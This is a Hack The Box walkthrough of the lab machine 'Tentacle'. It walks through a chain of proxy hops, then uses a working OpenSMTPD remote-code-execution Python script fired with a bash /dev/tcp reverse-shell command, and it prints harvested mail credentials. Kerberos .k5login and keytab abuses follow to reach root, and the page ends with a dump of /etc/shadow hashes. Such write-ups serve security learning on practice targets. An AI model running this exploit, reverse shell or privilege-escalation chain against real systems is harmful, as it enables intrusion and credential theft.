Hack-The-Box-walkthrough[Tentacle]

Introduction

OS: Linux
Difficulty: Hard
Points: 40
Release: 23 Jan 2021
IP: 10.10.10.224

information gathering

First, run nmap as usual:

```
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.224
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.0 (protocol 2.0)
53/tcp   open   domain       ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
88/tcp   open   kerberos-sec MIT Kerberos (server time: 2021-01-31 01:37:21Z)
3128/tcp open   http-proxy   Squid http proxy 4.11
9090/tcp closed zeus-admin
Service Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8
```

There's an HTTP proxy (Squid) on port 3128, so let's look there. nmap also gave us a hostname: REALCORP.HTB.

Got a username and a subdomain 😀 Note these little hints; they will help us later 🙂

```
j.nakazawa@realcorp.htb
srv01.realcorp.htb (squid/4.11)
```

I also got a hash while running GetNPUsers.py, but it seems uncrackable. I was stuck here for hours and finally found the way forward: fuzzing for other subdomains.

```
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# dnsenum --threads 64 --dnsserver 10.10.10.224 --file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb
ns.realcorp.htb.     259200 IN A     10.197.243.77
proxy.realcorp.htb.  259200 IN CNAME ns.realcorp.htb.
ns.realcorp.htb.     259200 IN A     10.197.243.77
ns.realcorp.htb.     259200 IN A     10.197.243.77
wpad.realcorp.htb.   259200 IN A     10.197.243.31
ns.realcorp.htb.     259200 IN A     10.197.243.77
```

So many domains and IPs 😦 But they aren't directly reachable; we need to go through the Squid proxy with proxychains to enumerate them 🙂

Update proxychains to avoid small errors 🙂

```
apt-get install proxychains4
```

Then add the proxies to our config file, /etc/proxychains.conf.

Here I'm using dynamic_chain; you can also use strict_chain 🙂

```
http 10.10.10.224  3128
http 127.0.0.1     3128
http 10.197.243.77 3128
```

Add these lines to the bottom of the conf file, then start enumerating. Each hop is reached through the previous one: the public Squid on 10.10.10.224 forwards to the Squid listening on its own loopback, which in turn reaches the internal proxy at 10.197.243.77.

Let's nmap again 🙂 and scan the .31 IP, wpad.realcorp.htb:

```
proxychains -f /etc/proxychains.conf nmap -sT -Pn -v 10.197.243.31
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
464/tcp  open  kpasswd5
749/tcp  open  kerberos-adm
3128/tcp open  squid-http
```

I trimmed the nmap output because it's too long 😀

There's a web server on port 80, let's look at it 😀 Remember we need to use proxychains to view the page, so:

```
proxychains -f /etc/proxychains.conf firefox wpad.realcorp.htb
```

Add this to the /etc/hosts file first: “10.197.243.31 wpad.realcorp.htb”

Got a 403 Forbidden there 😦 but at /wpad.dat we can download a file 🙂

Download and view it:

```
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# proxychains -f /etc/proxychains.conf wget http://wpad.realcorp.htb/wpad.dat
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
--2021-01-30 21:21:33-- http://wpad.realcorp.htb/wpad.dat
正在解析主机 wpad.realcorp.htb (wpad.realcorp.htb)... 10.197.243.31
正在连接 wpad.realcorp.htb (wpad.realcorp.htb)|10.197.243.31|:80... [proxychains] Dynamic chain ... 10.10.10.224:3128 ... 127.0.0.1:3128 ... 10.197.243.77:3128 ... 10.197.243.31:80 ... OK
已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:342 [application/octet-stream]
正在保存至: “wpad.dat”

wpad.dat 100%[=====================================================================>] 342 --.-KB/s 用时 0s

2021-01-30 21:21:37 (41.1 MB/s) - 已保存 “wpad.dat” [342/342])

┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# ls
wpad.dat
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# cat wpad.dat
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT";

    return "PROXY proxy.realcorp.htb:3128";
}
```

Look, another network 😦 Let's scan it. 10.197.243.0/24 we've already done, so let's try the second range, 10.241.251.0/24.

I scanned that whole range and found 10.241.251.113 with an SMTP port open 🙂
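As an added example (not code from the writeup), here is the recovered wpad.dat logic ported to Python so it can be evaluated offline: an anonymously readable PAC file tells anyone who fetches it exactly which internal ranges bypass the proxy, which is how the second /24 turned up. The RESOLVER table is a constructed stand-in for the PAC dnsResolve() helper.

```python
import ipaddress

# Constructed stand-in for dnsResolve(): the names and addresses seen in this
# writeup, plus one made-up external host.
RESOLVER = {
    "wpad.realcorp.htb": "10.197.243.31",
    "ns.realcorp.htb": "10.197.243.77",
    "smtp.realcorp.htb": "10.241.251.113",
    "example.com": "93.184.216.34",  # constructed external address
}


def dns_resolve(host):
    """PAC dnsResolve(): IPv4 address for host, or None if it does not resolve.
    A literal IP (as used when scanning raw ranges) resolves to itself."""
    try:
        return str(ipaddress.IPv4Address(host))
    except ipaddress.AddressValueError:
        return RESOLVER.get(host)


def dns_domain_is(host, domain):
    """PAC dnsDomainIs() as browsers implement it: a plain suffix test, so
    without a leading dot in `domain` a host like notrealcorp.htb also matches."""
    return len(host) >= len(domain) and host.endswith(domain)


def is_in_net(ip, pattern, mask):
    """PAC isInNet(): ip lies inside the network pattern/mask.
    An unresolvable host (ip is None) never matches and so goes via the proxy."""
    if ip is None:
        return False
    net = ipaddress.IPv4Network((pattern, mask), strict=False)
    return ipaddress.IPv4Address(ip) in net


def find_proxy_for_url(url, host):
    """Line-for-line port of FindProxyForURL() from wpad.dat: realcorp.htb
    names and the two internal /24s bypass the proxy, everything else is sent
    to proxy.realcorp.htb:3128. `url` is unused, as in the original."""
    if dns_domain_is(host, "realcorp.htb"):
        return "DIRECT"
    if is_in_net(dns_resolve(host), "10.197.243.0", "255.255.255.0"):
        return "DIRECT"
    if is_in_net(dns_resolve(host), "10.241.251.0", "255.255.255.0"):
        return "DIRECT"
    return "PROXY proxy.realcorp.htb:3128"


if __name__ == "__main__":
    for h in ("wpad.realcorp.htb", "10.241.251.113", "example.com", "nope.invalid"):
        print(f"{h:20} -> {find_proxy_for_url('http://' + h + '/', h)}")
```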

```
proxychains -f /etc/proxychains.conf nmap -sT -sV -Pn 10.241.251.113
....
Nmap scan report for 10.241.251.113
Host is up (1.1s latency).

PORT   STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
Service Info: Host: smtp.realcorp.htb
....
```

Fine, there's OpenSMTPD running; let's search the internet for exploits 🙂

```
google OpenSMTPD exploit
```

Sounds good 🙂 Let's try it (I tried many exploits in Python and Perl, and one in Metasploit).

But it looks like the exploit needs modifying to pop a shell, so I edited an exploit I found in “Remote code execution in OpenSMTPD”.

I simply modified that exploit to get a shell 🙂 Here it is:

  • getshell.py
```python
import socket, time
import sys

if len(sys.argv) < 4:
    print("usage: script.py <host> <port> <command>")
    exit()

HOST = sys.argv[1]
PORT = int(sys.argv[2])
rev_shell_cmd = sys.argv[3]

# Message body: the "#" lines are consumed by the read loop in MAIL FROM,
# then the command follows, then "." terminates DATA.
payload = b"""\r\n

#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n
#c\r\n
#d\r\n
""" + rev_shell_cmd.encode() + b"""
.
"""

# Connect to the first address that works (IPv4 or IPv6).
s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError as msg:
        s = None
        continue
    try:
        s.connect(sa)
    except OSError as msg:
        s.close()
        s = None
        continue
    break

if s is None:
    print('could not open socket')
    sys.exit(1)

with s:
    data = s.recv(1024)
    print('Received', repr(data))
    time.sleep(1)
    print('SENDING HELO')
    s.send(b"helo test.com\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
    time.sleep(1)
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"DATA\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(payload)
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"QUIT\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    print("Exploited Check you netcat :D")
    s.close()
```

Start a netcat listener and run the script above like this:

```
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# proxychains -f /etc/proxychains.conf python3 getshell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.14.25/3334 <&1"'
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Dynamic chain ... 10.10.10.224:3128 ... 127.0.0.1:3128 ... 10.197.243.77:3128 ... 10.241.251.113:25 ... OK
Received b'220 smtp.realcorp.htb ESMTP OpenSMTPD\r\n'
SENDING HELO
RECIEVED b'250 smtp.realcorp.htb Hello test.com [10.241.251.1], pleased to meet you\r\n'
RECIEVED b'250 2.0.0 Ok\r\n'
RECIEVED b'250 2.1.5 Destination address valid: Recipient ok\r\n'
RECIEVED b'354 Enter mail, end with "." on a line by itself\r\n'
RECIEVED b'250 2.0.0 f1c85e8f Message accepted for delivery\r\n'
RECIEVED b'221 2.0.0 Bye\r\n'
Exploited Check you netcat :D
```

And we got a shell:

```
┌──(root💀kali)-[~]
└─# nc -lvp 3334
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::3334
Ncat: Listening on 0.0.0.0:3334
Ncat: Connection from 10.10.10.224.
Ncat: Connection from 10.10.10.224:52864.
bash: cannot set terminal process group (12): Inappropriate ioctl for device
bash: no job control in this shell
root@smtp:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@smtp:~# whoami
whoami
root
```

Cool, we got a shell as root on the smtp host.

PRIVESC TO USER

Let's search for creds:

```
root@smtp:/home/j.nakazawa# cat .msmtprc
cat .msmtprc
# Set default values for all following accounts.
defaults
auth on
tls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile /dev/null

# RealCorp Mail
account realcorp
host 127.0.0.1
port 587
from j.nakazawa@realcorp.htb
user j.nakazawa
password sJB}RM>6Z~64_
tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60

# Set a default account
account default : realcorp
```

Quickly got creds 😀 They're in /home/j.nakazawa/.msmtprc.

But sadly we can't SSH in with them 😦 We need to use Kerberos to get a ticket and then use that ticket to log in as the user. Let's do that.

Make sure the Kerberos client is installed; if not, install it with the command below:

```
apt-get install krb5-user
```

Then modify the /etc/hosts and /etc/krb5.conf files.

```
10.10.10.224    srv01.realcorp.htb
```

Make sure this host entry is in /etc/hosts.

```
default_realm = REALCORP.HTB

REALCORP.HTB = {
    kdc = 10.10.10.224
}
```

Add this to /etc/krb5.conf (default_realm goes under [libdefaults], the realm block under [realms]).

Then generate the ticket:

```
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# kinit j.nakazawa
Password for j.nakazawa@REALCORP.HTB:
```

kinit asks for a password; enter the one we found above in /home/j.nakazawa/.msmtprc.

```
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: j.nakazawa@REALCORP.HTB

Valid starting       Expires              Service principal
2021-01-30T22:12:34  2021-01-31T22:10:00  krbtgt/REALCORP.HTB@REALCORP.HTB
```

Use klist to check the available tickets.

There you go, now simply log in; this time it won't ask for a password. If it does ask, you made a mistake somewhere 😦 Correct it and try again.

```
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# ssh j.nakazawa@10.10.10.224
The authenticity of host '10.10.10.224 (10.10.10.224)' can't be established.
ECDSA key fingerprint is SHA256:eWzMB5HoqVH++9udWLB4bYS/8KguhJxNZPtZ3JLc3oo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.224' (ECDSA) to the list of known hosts.
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Thu Dec 24 06:02:06 2020 from 10.10.14.2
[j.nakazawa@srv01 ~]$ id
uid=1000(j.nakazawa) gid=1000(j.nakazawa) 组=1000(j.nakazawa),23(squid),100(users) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[j.nakazawa@srv01 ~]$ whoami
j.nakazawa
[j.nakazawa@srv01 ~]$ ls
user.txt
[j.nakazawa@srv01 ~]$ cat user.txt
3e644f8b453a335ba99548e35919b78e
```

Good, we're logged in as j.nakazawa. Quickly grab user.txt and follow my steps; from here on it's a headache to move forward.

PRIVESC TO ADMIN

```
[j.nakazawa@srv01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * admin /usr/local/bin/log_backup.sh
```

Fine, looking at the crontab there's a script running every minute as admin, “log_backup.sh”. Let's view it 🙂

```
[j.nakazawa@srv01 ~]$ cat /usr/local/bin/log_backup.sh
#!/bin/bash

/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
cd /home/admin
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log
```

It backs up everything from /var/log/squid/ to /home/admin/.

So if we put something in the squid log folder, it'll be copied into admin's home. Let's create a Kerberos login file (.k5login); once it's copied into admin's home we can log in as admin.

Now create a file named .k5login:

```
[j.nakazawa@srv01 ~]$ echo "j.nakazawa@REALCORP.HTB" > .k5login
[j.nakazawa@srv01 ~]$ ls -la
总用量 20
drwxr-x---. 2 j.nakazawa j.nakazawa 131 1月  31 03:22 .
drwxr-xr-x. 4 root       root        37 11月  3 15:22 ..
lrwxrwxrwx. 1 root       root         9 12月  9 08:26 .bash_history -> /dev/null
-rw-r--r--. 1 j.nakazawa j.nakazawa  18 11月  8 2019 .bash_logout
-rw-r--r--. 1 j.nakazawa j.nakazawa 141 11月  8 2019 .bash_profile
-rw-r--r--. 1 j.nakazawa j.nakazawa 312 11月  8 2019 .bashrc
-rw-rw-r--. 1 j.nakazawa j.nakazawa  24 1月  31 03:22 .k5login
lrwxrwxrwx. 1 root       root         9 12月  9 12:30 .lesshst -> /dev/null
-r--------. 1 j.nakazawa j.nakazawa  33 1月  31 01:12 user.txt
[j.nakazawa@srv01 ~]$ cat .k5login
j.nakazawa@REALCORP.HTB
```

```
cp .k5login /var/log/squid
```

Then copy this file into /var/log/squid. We can't list that folder (permission denied), but we can copy the file there, so do that.

```
┌──(root💀kali)-[~]
└─# ssh admin@srv01.realcorp.htb
The authenticity of host 'srv01.realcorp.htb (10.10.10.224)' can't be established.
ECDSA key fingerprint is SHA256:eWzMB5HoqVH++9udWLB4bYS/8KguhJxNZPtZ3JLc3oo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'srv01.realcorp.htb' (ECDSA) to the list of known hosts.
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Sun Jan 31 03:27:01 2021
[admin@srv01 ~]$ id
uid=1011(admin) gid=1011(admin) 组=1011(admin),23(squid) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[admin@srv01 ~]$ whoami
admin
[admin@srv01 ~]$ ls
squid_logs.tar.gz.2021-01-31-032501 squid_logs.tar.gz.2021-01-31-032601 squid_logs.tar.gz.2021-01-31-032701
```

After that, try to log in as admin (try 2 or 3 times); sometimes it takes a minute for the cron job to copy the login file.
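Why a copied file is enough to take over the account, as an added example that is not part of the writeup: the block models the two rules the cron job chains together, who owns a file after rsync copies it (the source owner is kept only when -o is in effect and the receiver runs as root) and MIT krb5's .k5login authorization (only listed principals, and only from a file owned by the target user or root). The rsync line is the one from log_backup.sh; the functions are a simplified model, not rsync's or krb5's own code, and assume krb5's default k5login_authoritative behaviour with no auth_to_local rules.

```python
# rsync invocation from log_backup.sh on the page; cron runs it as admin every minute.
LOG_BACKUP_RSYNC = ("/usr/bin/rsync -avz --no-perms --no-owner --no-group "
                    "/var/log/squid/ /home/admin/")


def rsync_result_owner(cmd, invoking_user, source_owner):
    """Owner of a file on the receiving side after rsync copies it.
    The source owner survives only if -o/--owner (implied by -a/--archive) is
    in effect, is not cancelled by --no-owner, and rsync runs as root;
    otherwise the copy belongs to whoever ran rsync."""
    tokens = cmd.split()
    short_flags = "".join(t[1:] for t in tokens
                          if t.startswith("-") and not t.startswith("--"))
    preserve = ("o" in short_flags or "a" in short_flags
                or "--owner" in tokens or "--archive" in tokens)
    if "--no-owner" in tokens or "--no-o" in tokens:
        preserve = False
    return source_owner if preserve and invoking_user == "root" else invoking_user


def k5login_authorizes(principal, local_user, default_realm,
                       k5login_lines=None, k5login_owner=None):
    """Simplified model of MIT krb5's krb5_kuserok(): may `principal` act as
    `local_user`?  Without a ~/.k5login only local_user@DEFAULT_REALM may.
    With one, the file replaces that default entirely: krb5 ignores it unless
    it is owned by the user or root, and the principal must appear on a line
    by itself (so even the account's own principal must be listed)."""
    if k5login_lines is None:
        return principal == f"{local_user}@{default_realm}"
    if k5login_owner not in (local_user, "root"):
        return False
    return any(line.strip() == principal for line in k5login_lines)


def who_can_login_as(local_user, default_realm, candidates, **k5login):
    """Which of `candidates` krb5 would accept for `local_user`."""
    return sorted(p for p in candidates
                  if k5login_authorizes(p, local_user, default_realm, **k5login))


if __name__ == "__main__":
    realm = "REALCORP.HTB"
    principals = ["admin@REALCORP.HTB", "j.nakazawa@REALCORP.HTB"]
    print("before:", who_can_login_as("admin", realm, principals))
    # j.nakazawa drops .k5login into /var/log/squid; the cron job copies it to
    # /home/admin and, because of --no-owner, admin ends up owning it.
    owner = rsync_result_owner(LOG_BACKUP_RSYNC, "admin", "j.nakazawa")
    planted = ["j.nakazawa@REALCORP.HTB"]
    print("after: ", who_can_login_as("admin", realm, principals,
                                      k5login_lines=planted, k5login_owner=owner))
```

The audit point for a defender follows directly: a scheduled job that copies from a directory writable by other users into a home directory hands those users every dotfile that home directory honours, .k5login included.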

ADMIN TO ROOT

Fine, now we're admin. After enumerating for a while, one file looks interesting: “krb5.keytab”, located in /etc.

```
[admin@srv01 ~]$ klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
```

So what’s a keytab file?

A keytab is a file containing pairs of Kerberos principals and encrypted keys (which are derived from the Kerberos password). You can use a keytab file to authenticate to various remote systems using Kerberos without entering a password.

Note that last part, “without entering a password”: that's exactly what we're going to do now 😀

```
kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
```

Run this:

```
add_principal root@REALCORP.HTB
```

Then the kadmin console opens; add this principal in it:

```
[admin@srv01 ~]$ kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
Couldn't open log file /var/log/kadmind.log: Permission denied
Authenticating as principal kadmin/admin@REALCORP.HTB with keytab /etc/krb5.keytab.
kadmin: add_principal root@REALCORP.HTB
No policy specified for root@REALCORP.HTB; defaulting to no policy
Enter password for principal "root@REALCORP.HTB":
Re-enter password for principal "root@REALCORP.HTB":
Principal "root@REALCORP.HTB" created.
```

It then asks you to set a password; set one, then leave the kadmin console by typing exit.

```
[admin@srv01 ~]$ ksu root
WARNING: Your password may be exposed if you enter it here and are logged
in remotely using an unsecure (non-encrypted) channel.
Kerberos password for root@REALCORP.HTB: :
Authenticated root@REALCORP.HTB
Account root: authorization for root@REALCORP.HTB successful
Changing uid to root (0)
[root@srv01 admin]# id
uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@srv01 admin]# whoami
root
[root@srv01 admin]# cd
[root@srv01 ~]# ls
anaconda-ks.cfg Linux_release_checklist.sh root.txt
[root@srv01 ~]# cat root.txt
9b46410371881ac43708ca604eb10aab
```

Then type ksu root; when it asks for the password, type the one you created above in kadmin 😀

```
[root@srv01 ~]# cat /etc/shadow
root:$6$2ZKaulGjQ1QUYQHO$OmVJBK0.VeikBcOsxyrLfPCEkrfo6S8SJmHd4FH7el9vHcduJrO7jHYEHjIN7Z4n1c3KBLNe5L9inXSgeBsNS.:18605:0:99999:7:::
bin:*:18358:0:99999:7:::
daemon:*:18358:0:99999:7:::
adm:*:18358:0:99999:7:::
lp:*:18358:0:99999:7:::
sync:*:18358:0:99999:7:::
shutdown:*:18358:0:99999:7:::
halt:*:18358:0:99999:7:::
mail:*:18358:0:99999:7:::
operator:*:18358:0:99999:7:::
games:*:18358:0:99999:7:::
ftp:*:18358:0:99999:7:::
nobody:*:18358:0:99999:7:::
dbus:!!:18602::::::
systemd-coredump:!!:18602::::::
systemd-resolve:!!:18602::::::
tss:!!:18602::::::
polkitd:!!:18602::::::
libstoragemgmt:!!:18602::::::
cockpit-ws:!!:18602::::::
cockpit-wsinstance:!!:18602::::::
sssd:!!:18602::::::
sshd:!!:18602::::::
chrony:!!:18602::::::
rngd:!!:18602::::::
unbound:!!:18602::::::
squid:!!:18602::::::
named:!!:18602::::::
nginx:!!:18602::::::
j.nakazawa:$6$W68LBvOuL0H13AqJ$G4JdGleMyHdzvBmpcV7JiLupa3bosgxHj.aUfxcydXIODXuepjj6uUIQ/5E2THv2sf5Qhp7qtBIEu4kmNl2pU1:18604:0:99999:7:::
admin:!!:18605:0:99999:7:::
setroubleshoot:!!:18620::::::
```

Summary of knowledge

  • usage of proxychains
  • dnsenum to fuzz subdomains
  • OpenSMTPD remote code execution
  • using Kerberos (kinit) to get a ticket and log in with it
  • abusing a cron job to copy files into another user's home
  • using a keytab file to authenticate via Kerberos without entering a password, to get root

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lUc1f3r11, a CTFer, reverse engineer, IoTer, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…